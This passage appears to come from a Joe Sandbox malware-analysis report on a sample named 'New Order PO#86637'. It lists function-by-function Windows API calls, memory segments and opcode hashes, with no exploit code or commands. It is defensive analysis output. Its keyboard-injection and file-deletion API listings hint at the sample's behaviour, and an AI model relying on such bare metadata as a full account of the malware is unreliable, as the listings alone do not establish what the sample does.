                                                                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 259663610-0
                                                                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                            • String ID:
                                                                            • API String ID: 3220332590-0
                                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1612042205-0
                                                                            • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                            • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strncmp
                                                                            • String ID: >$U$\
                                                                            • API String ID: 2666721431-237099441
                                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 2221674350-0
                                                                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2037614760-0
                                                                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                                            • String ID:
                                                                            • API String ID: 960795272-0
                                                                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$Copy__fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2446588422-0
                                                                            • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                            • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                                            • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                            • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 4189319755-0
                                                                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 1976402638-0
                                                                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ClearErrorLast
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 2487901850-572801152
                                                                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 1871949834-0
                                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                            • SendMessageW.USER32 ref: 00471AE3
                                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                            • String ID:
                                                                            • API String ID: 3611059338-0
                                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
